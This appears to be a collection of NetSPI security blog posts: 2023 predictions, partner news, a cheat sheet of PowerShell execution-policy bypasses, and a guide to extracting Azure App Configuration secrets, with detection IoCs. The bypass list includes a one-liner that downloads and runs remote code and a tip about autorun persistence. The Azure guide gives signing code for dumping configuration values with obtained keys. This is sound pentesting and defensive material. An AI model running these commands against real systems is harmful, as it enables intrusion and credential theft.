Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain

On December 29, NetSPI’s Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DLT Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DLT) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises” that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

NetSPI Partner of the Year Awards 2022

Earlier this year we launched a new partner program, dedicated to equipping partners with pentesting tools, services, and talent, bolstering security worldwide. Our partners have embraced this program, helping us grow our partner community by more than 50%, double our partner-generated opportunities, and achieve 150% of last year’s revenue with partners. Read more about the partner program.  

Today, we are pleased to announce the winners of our inaugural Partner of the Year awards. These awards celebrate the outstanding achievements and contributions of our partners over the past year. Honorees include: 

US Partner of the Year: VLCM

VLCM, an enterprise technology and data solutions provider, has earned the title of US Partner of the Year for their exceptional performance in driving sales and supporting our customers in the US market. Their dedication to our partnership and commitment to excellence has played a vital role in our success as we strive to keep our mutual customers secure, connected, smart, and agile. 

Global Partner of the Year: SecureLink

SecureLink, a risk advisory firm headquartered in Dubai, has been named Global Partner of the Year for their outstanding contributions to our global expansion. Their expertise and well-established trust have been invaluable as the NetSPI customer base continues to grow in Europe, the Middle East and Africa. 

New Partner of the Year: CompuNet

CompuNet, an engineer-led IT solution provider that offers consulting, design and implementation services built on-premise or in the cloud, has been awarded New Partner of the Year for their impressive performance and strong partnership in their first year working with us. Their innovative solutions and proactive approach have helped us to drive growth and meet the needs of our customers. 

Tech Partner of the Year: Contrast Security

Contrast Security, a leading Application Security software company, has been honored as Tech Partner of the Year for their outstanding technical support and innovative solutions, including their compatibility with NetSPI’s Penetration Testing as a Service (PTaaS) platform, Resolve™. Their expertise and dedication to our partnership has enabled us to deliver the best possible products and services to our customers.  

Check out our recent podcast with Larry Maccherone, DevSecOps Transformation Architect at Contrast Security where we explore an untraditional approach to DevSecOps and the future of AppSec Testing.

Closing Thoughts as We Look Toward 2023 

To our partner community: we are grateful to every single one of you for your hard work and dedication, and we look forward to continuing to drive success with you in the coming year.  

Our partner relationships will be more important than ever, and we’re ready to support our mutual customers as they face new market challenges. Together, we will deliver demonstrable success to our clients’ cybersecurity programs.  

A special thank you to VLCM, SecureLink, CompuNet, and Contrast Security for being such valuable partners and congratulations on your well-deserved recognition! 

9 Trends That Will Dominate Cybersecurity in 2023 

As 2022 comes to a close, it’s clear that this has been a restless year for both threat actors and cybersecurity professionals.

The year started off with a bang as the industry worked around the clock to detect and patch the Log4j vulnerabilities following a mid-holiday disclosure. The cyber sector remained in a perpetual busy season as new technologies like cryptocurrency wallets were hacked, non-profit organizations and health insurance providers suffered data breaches, and entire government systems experienced ransomware attacks – not to mention the prevalence of Russian cyberwarfare which signaled the need for heightened security across the globe.

But for every hack, data breach, and ransomware attack that occurred, there were thousands prevented by global cybersecurity practitioners. There’s a lot of innovation and collaboration to celebrate as we turn the page to 2023.

As we enter the new year, we asked our global team to chime in on the trends they anticipate. From machine learning and software supply chain attacks to the cybersecurity shortage and cyber insurance, our team sees big things ahead.

Table of Contents

  1. There will be an emphasis on machine learning security, threats, and vulnerabilities.
  2. Distributed Ledger Technology (DLT) will help mitigate software supply chain attacks.
  3. The way organizations approach pentesting will become more continuous.
  4. Cyber insurance will become a leading driver for investment in security.
  5. By the end of next year every major financial institution will have announced adoption of blockchain technology.
  6. We will see industry aligned compliance regulations with real penalties.
  7. Training programs will have even more emphasis placed on them to narrow the employment gap.
  8. We expect to see an increase in cloud-agnostic application designs – and corresponding configuration and application vulnerabilities.
  9. The breach and attack simulation market is in the midst of its evolution.

There will be an emphasis on machine learning security, threats, and vulnerabilities. 

“Machine learning (ML) is already deployed in numerous technologies, especially those concerned with security — for example email filters, security information and event management (SIEM) dashboards, and endpoint detection and response (EDR) products. If you thought you could delay ML security conversations, think again. There is a growing group of security researchers focused on Adversarial ML, which includes both attacks on models themselves (inversion, extraction, cloning, etc.) and the use of ML in network attacks and social engineering.  

In the upcoming year, we’ll see a growing list of vulnerabilities being published for ML-integrated systems. Additionally, we’ll see a large amount of research focused on evading classification models to improve attacker success rates as well as some of the first notable “model duplication” incidents — where one entity is accused of cloning a model or attackers release “cloned models” of sensitive classifiers and advanced prediction engines. Privacy is often overlooked when thinking about model training, but data cannot be completely anonymized without destroying its value to ML. In other words, models already contain swaths of private data that might be extracted as part of an attack. While many companies claim to have ‘private enterprise models’, I suspect we’ll begin seeing data breaches from model extraction research.” — Nick Landers, VP of Research, NetSPI

Distributed Ledger Technology (DLT) will help mitigate software supply chain attacks.  

“Over the last few years, there have been several ‘supply chain compromises’ that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. As a result, we expect to see software supply chain attacks continue into 2023 and we need a solution.  

This is where distributed ledger technology (DLT) comes in. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). DLT could be a real asset in stopping supply chain attacks and though the adoption of DLT is still in its infancy, we’ll see some interesting use cases gain momentum in 2023.” — Scott Sutherland, VP of Research, NetSPI 

The way organizations approach pentesting will become more continuous. 

“The perimeter is essentially dead, so the way organizations approach pentesting has to evolve. The attack surface has become more fluid so you have to be able to scan for new assets and entry points continuously. In 2023, organizations will combine traditional pentesting, which in many cases will still be required for regulatory needs, with the proactive approach of a continual assessment of their attack surface. The result will be better awareness of the attack surface and more comprehensive traditional pentesting as there is more information about the true attack surface.” — Chad Peterson, Managing Director, NetSPI

Cyber insurance will become a leading driver for investment in security. 

“Cyber insurance will become a leading driver for investment in security and IT controls. Carriers and brokers will continue to increase underwriting requirements with the goal of not paying out on claims. The challenge for CISOs, CROs, CIOs, CFOs and Board of Directors is that the carriers will use requirements focused on avoiding claims meaning another “compliance” requirement on top of the existing ones. While there may be evolution to acceptance of SOC 2, NIST, ISO and other certifications, the expense will be there for years.” — Norman Kromberg, Managing Director, NetSPI 

By the end of next year every major financial institution will have announced adoption of blockchain technology. 

“There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.  

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.” — Nick Landers, VP of Research, NetSPI

We will see industry aligned compliance regulations with real penalties. 

“Regulations will continue to evolve and become more prescriptive. Regulations need to be much more mature, stringent, and punitive. Organizations must be held accountable for their inaction in the area of cybersecurity. For far too long organizations have not taken cybersecurity seriously enough. No longer is it okay for an organization to act as though it wasn’t their fault or that they weren’t culpable for a breach that occurred. At the very least regulations must hold organizations accountable for the implementation of “Minimum Necessary” cybersecurity controls with heavy penalties for non-compliance. Organizations will be held accountable for basic cybersecurity hygiene. If an organization is unable to meet the most basic standards, a regulator will require a third-party to take over Cybersecurity Program execution (and the organization will be mandated to cover the associated costs). Like the FDA, we will start seeing industry aligned compliance regulations with real penalties that will force compliance and organizational change. The key will be enforcement and penalties.” — Ron Kuriscak, Managing Director, NetSPI

Training programs will have even more emphasis placed on them to narrow the employment gap. 

“2023 will continue to be a jobseeker’s market as many organizations continue to hire cybersecurity talent. With the current cybersecurity shortage demand continues to outweigh supply. Cybercrime magazine predicts that there will still be 3.5 million cyber openings come 2025 — a staggering number to think about, but it’s not changing anytime soon. Training programs, like NetSPI University, will have even more emphasis placed on them to narrow that employment gap. NetSPI U has contributed to the scaling of our consulting team immensely (100+ hires through NetSPI U since 2018). If other organizations can figure out how to hire for team/culture fit and train cybersecurity specific skills through similar programs, the talent gap will continue to lessen. Additionally, in-depth but quick interview processes have become instrumental in hiring top talent before the competition — gone are the days of a drawn-out interview process as candidates are on and off the market extremely fast.” — Heather Crosley, VP People Operations, NetSPI 

We expect to see an increase in cloud-agnostic application designs – and corresponding configuration and application vulnerabilities. 

“Almost every company we work with is building in the cloud or in the process of migrating to it. While companies may dabble in many cloud platforms, they deploy the vast majority of their infrastructure in one primary platform. As part of that effort, many companies have built their applications using cloud-native, platform-specific technologies. For many companies, that initial transition to the cloud provides them with new performance benefits and the ability to truly scale applications and/or services for the first time. However, the downside to this is that after they’ve spent all of those R&D dollars on their initial deployments, they may want to move their applications and/or services to another cloud platform (for a variety of reasons, including cost) but they can’t pivot without a herculean effort (and additional cost). To avoid this problem in the future many companies are investing dev dollars into cloud-agnostic application designs, which tend to rely on both Kubernetes and containers like Docker. Changing our collective mindset about the “right way” to build and deploy applications in that direction introduces a whole new set of configuration and application vulnerabilities that many companies are not prepared to address. Given the trends from previous years, we expect to see some growth in products and services in that space over the next year.” — Karl Fosaaen, VP of Research, NetSPI  

The breach and attack simulation market is in the midst of its evolution. 

“The Breach and Attack Simulation (BAS) market is in the middle of its evolution, and we can expect to see some useful incremental improvements as we turn the page on the year. At a high level, customers really value a human component, but many BAS solutions in the market don’t offer that today. This will lead to service companies growing in the product space and products moving toward the services space. As a result, most security companies will need to provide a hybrid of technology-enabled services just to stay competitive in the next few years. 

However, to meet customer demand in 2023, more BAS platforms will offer robust modules to simulate flexible command and control, email stack, and native cloud platform attack procedures, as well as the ability to create or customize modules in a meaningful way. Additionally, we’ll see an increase in streamlined product deployments (most likely in the form of SaaS-based offerings) and integrations, as well as improvements in validation inconsistencies and an increase in BAS solutions that offer meaningful data insights.  

To reduce the costs needed for configurations, we’ll see more BAS companies working to streamline their product deployments to help reduce the overhead on their customers. We’ll also see innovations created to help streamline the integration process and limit the need for customization. It is also a challenge to verify that every attack module run by a BAS platform was delivered, executed, and completed successfully. It’s even harder to accurately determine if the action was blocked (and by what), determine if an alert was generated, and verify the alert triggered the creation of a proper response ticket, which is why I believe we’ll see strides made this year to address validation inconsistencies. Finally, we’ll see an increase in BAS solutions in the market that offer meaningful data insights to allow companies to track their detection coverage over time.” — Scott Sutherland, VP of Research, NetSPI 

The cybersecurity industry will certainly be thrown curveballs in 2023 but keeping an eye on these nine trends may just help you stay one step ahead of adversaries and inevitable change. For additional research and insights from Team NetSPI, visit https://www.netspi.com/pentesting-team/.

15 Ways to Bypass the PowerShell Execution Policy

By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn’t have to be. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I’m sure there are many techniques that I’ve missed (or simply don’t know about), but hopefully this cheat sheet will offer a good start for those who need it.

What is the PowerShell Execution Policy?

The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default it is set to “Restricted”, which basically means none. However, it’s important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That’s why there are so many options for working around it, including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell, I suggest reading Carlos Perez’s blog, which provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

  • Native to Windows
  • Able to call the Windows API
  • Able to run commands without writing to the disk
  • Able to avoid detection by antivirus
  • Already flagged as “trusted” by most application whitelisting solutions
  • A medium used to write many open source pentest toolkits

How to View the Execution Policy

Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the “Restricted” execution policy. You can take a look at the current configuration with the “Get-ExecutionPolicy” PowerShell command. If you’re looking at the setting for the first time, it’s likely set to “Restricted” as shown below.

PS C:\> Get-ExecutionPolicy
Restricted

It’s also worth noting that the execution policy can be set at different levels on the system. To view a list of them use the command below. For more information you can check out Microsoft’s “Set-ExecutionPolicy” page here.

Get-ExecutionPolicy -List | Format-Table -AutoSize

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy, I get an error stating that the script cannot be loaded because running scripts is disabled on the system.

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command “Set-ExecutionPolicy Restricted” from an administrator PowerShell console. Ok – enough of my babbling – below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user’s privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.


2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows “type” command or PowerShell “Get-Content” command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you’re trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -


Example 2: Type command

TYPE .\runme.ps1 | PowerShell.exe -noprofile -

4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It’s nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"


Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations (like the all users startup folder) to help during privilege escalation.

6. Use the EncodeCommand Switch

This is very similar to the “Command” switch, but all scripts are provided as a Unicode/base64 encoded string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the “Command” switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
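To sanity-check an encoded command, you can also reverse the process. The snippet below decodes the Base64 string from Example 2 back into the original command text:

```powershell
# Decode a -EncodedCommand string back to plain text (Base64 -> Unicode/UTF-16LE).
$encoded = "VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA"
[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))
```

This should print the same Write-Host command that was encoded in Example 1.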

7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that’s typically executed through an interactive PowerShell console or one liner using the “Command” switch. This technique does not result in a configuration change or require writing to disk. Below are a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .\runme.ps1 | Invoke-Expression

Example 2: Short command using Get-Content

GC .\runme.ps1 | iex

9. Use the “Bypass” Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you’re executing scripts from a file. When this flag is used Microsoft states that “Nothing is blocked and there are no warnings or prompts”. This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the “Unrestricted” Execution Policy Flag

This is similar to the “Bypass” flag. However, when this flag is used Microsoft states that it “Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs.” This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1

11. Use the “RemoteSigned” Execution Policy Flag

Create your script, then follow the tutorial written by Carlos Perez to sign it. Finally, run it using the command below:

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the “command” switch. Once the function is called, it will swap out the “AuthorizationManager”, and as a result the execution policy is essentially set to unrestricted for the remainder of the session. This technique does not result in a persistent configuration change or require writing to disk; the change applies only for the duration of the session.

function Disable-ExecutionPolicy {
    ($ctx = $executioncontext.GetType().GetField("_context","nonpublic,instance").GetValue($executioncontext)).GetType().GetField("_authorizationManager","nonpublic,instance").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}

Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicy for the Process Scope

As we saw in the introduction, the execution policy can be applied at many levels, including the process, which you have control over. Using this technique, the execution policy can be set to unrestricted for the duration of your session. It does not result in a persistent configuration change or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process

14. Set the ExecutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user’s environment persistently by modifying a registry key. Unlike the process scope, this does result in a persistent configuration change, but it does not require writing a script to the disk.

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

In this example I’ve shown how to change the execution policy for the current user’s environment persistently by modifying a registry key directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell

Wrap Up

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testers. Microsoft never intended it to be a security control, which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options, and the security community has also come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don’t forget to hack responsibly. 😉

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.


Hacker Valley: Intentional Investments in People-Focused Leadership with Cody Wass

On December 15, NetSPI VP of Services Cody Wass was featured in the Hacker Valley podcast episode called Intentional Investments in People-Focused Leadership with Cody Wass. Read the preview below or view it online.

+++

Cody Wass, VP of Services at NetSPI, brings his near-decade of experience to the pod to talk about longevity, development, and leadership. It’s no secret that cybersecurity is in need of people. Cody’s journey from intern to VP at NetSPI has shown him the importance of training employees, creating opportunities for new graduates, and engaging teams effectively, both virtually and in-person. In this episode, Cody provides the roadmap towards intentional employee investment in the ever-changing cyber industry.


Switched On: Digital Transformation as Improving Processes with Alex Jones

On December 8, NetSPI Chief Revenue Officer, Alex Jones, was featured in the Switched On podcast called Digital Transformation as Improving Processes with Alex Jones. Read the preview below or view it online.

+++

James and Paul talk to Alex Jones (not THAT one) from NetSPI about the heretofore unseen connections between penetration testing and security. Alex brings a fresh perspective from his sales and marketing leadership positions, and it really stretched our imaginations. 


How to Gather Azure App Configurations

Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that application configuration parameters are shared between multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service, which allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a convenient way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.
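To illustrate what the service hands back, here is the general shape of a response from the service's "/kv" endpoint, based on Microsoft's REST API reference for App Configuration. The key name and value below are made-up examples, not real data:

```json
{
  "items": [
    {
      "etag": "4f6dd610dd5e4deebc7fbaef685fb903",
      "key": "ConnectionStrings:Storage",
      "label": null,
      "content_type": "",
      "value": "DefaultEndpointsProtocol=https;AccountName=example;AccountKey=...",
      "tags": {},
      "locked": false,
      "last_modified": "2022-12-01T00:00:00+00:00"
    }
  ]
}
```

Note the "locked" field, which comes up again later: locked key-values cannot be modified through the API.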

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, either can lead to access to the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys, which is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/action” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an App Configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

An example of an App Configuration access key found in public data sources.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.
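For reference, the signing scheme itself is straightforward. Below is a minimal Python sketch of Microsoft's documented HMAC-SHA256 authentication for azconfig.io requests; the endpoint host, Id, and Secret used here are placeholders, and MicroBurst's Get-AzAppConfiguration implements the equivalent logic in PowerShell:

```python
import base64
import hashlib
import hmac
from datetime import datetime, timezone

def sign_request(endpoint_host, credential_id, secret_b64, method="GET",
                 path_and_query="/kv?api-version=1.0", body=b""):
    """Build the signed headers for an azconfig.io request.

    Per Microsoft's documented scheme, the string-to-sign is:
        {method}\n{path_and_query}\n{date};{host};{content_hash}
    and the signature is an HMAC-SHA256 over it, keyed with the
    base64-decoded Secret from the connection string.
    """
    # RFC 1123 date, required in the x-ms-date header
    utc_now = datetime.now(timezone.utc).strftime("%a, %d %b %Y %H:%M:%S GMT")
    # SHA256 hash of the request body (empty for GET), base64-encoded
    content_hash = base64.b64encode(hashlib.sha256(body).digest()).decode()
    string_to_sign = f"{method}\n{path_and_query}\n{utc_now};{endpoint_host};{content_hash}"
    signature = base64.b64encode(
        hmac.new(base64.b64decode(secret_b64),
                 string_to_sign.encode("utf-8"),
                 hashlib.sha256).digest()
    ).decode()
    return {
        "x-ms-date": utc_now,
        "x-ms-content-sha256": content_hash,
        "Authorization": (
            f"HMAC-SHA256 Credential={credential_id}"
            f"&SignedHeaders=x-ms-date;host;x-ms-content-sha256"
            f"&Signature={signature}"
        ),
    }
```

Sending these headers along with a GET to `https://{endpoint_host}{path_and_query}` is all it takes to pull back the key-value pairs.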

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log – List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – <UPN of account listing keys>
  • App Configuration Service Logs

An example of an app configuration audit log, capturing details of the account used to access data.

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string, and give defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.


How to Paint a Comprehensive Threat Detection Landscape

In practice, threat detection is not a binary – it is a process. An organization’s coverage depends on where they are within that process. By measuring that process across the Tactics, Techniques and Procedures (TTPs) of the MITRE ATT&CK framework you can paint a realistic picture of your detection landscape. 

Detection is generally carried out in the following consecutive steps: Logging, Detection, Alerting, and Response. Each step in the pipeline is a piece of metadata that should be tracked alongside procedures to paint our landscape. This data tells us where we do or do not have visibility and where our technology, people, and processes (TPPs) fail or are incomplete.

  • Logging – Generally, logs must be collected and aggregated to identify malicious activity. This is not only important from a forensic perspective, but also for creating, validating, and updating baselines.
  • Detection – Detection can then be derived from the log aggregations. Detections are typically separated by fidelity levels, which then feed alerts.
  • Alerting – Alerts are any event, detection, or correlation that requires triage and may warrant a more in-depth response action. Events at this level can still be somewhat voluminous but are typically deemed impactful enough to require some human triage and response.
  • Response – Response is where technology is handed off to people and processes. Triage, investigation, escalation, and eviction of the adversary occur within a response. Response is usually executed by a security operations or incident response team. The response actions vary depending on the internal playbooks of the company.
  • Prevention – This sits somewhat outside the threat detection pipeline. Activities can, and often are, prevented without further alerting or response. Prevention may occur without events being logged. Ideally, preventions should be logged to feed into the detection and alert steps of the pipeline.
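The per-procedure metadata described above can be tracked in something as simple as a table or dictionary and rolled up into a coverage score. Here is a minimal Python sketch; the ATT&CK procedure names and boolean values are hypothetical placeholders, not real assessment data:

```python
# Pipeline steps tracked per tested procedure, plus prevention
PIPELINE = ("logging", "detection", "alerting", "response", "prevention")

# Hypothetical results for two procedures under one ATT&CK technique
procedures = {
    "T1003.001 (LSASS dump via comsvcs)": {
        "logging": True, "detection": True, "alerting": True,
        "response": False, "prevention": False,
    },
    "T1003.001 (LSASS dump via rundll32)": {
        "logging": True, "detection": False, "alerting": False,
        "response": False, "prevention": True,
    },
}

def technique_coverage(procs):
    """Fraction of (procedure, pipeline step) pairs that are covered."""
    total = len(procs) * len(PIPELINE)
    covered = sum(steps[s] for steps in procs.values() for s in PIPELINE)
    return covered / total

print(f"T1003.001 coverage: {technique_coverage(procedures):.0%}")
```

Aggregating scores like this across many techniques is what turns individual test results into the landscape view described below.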

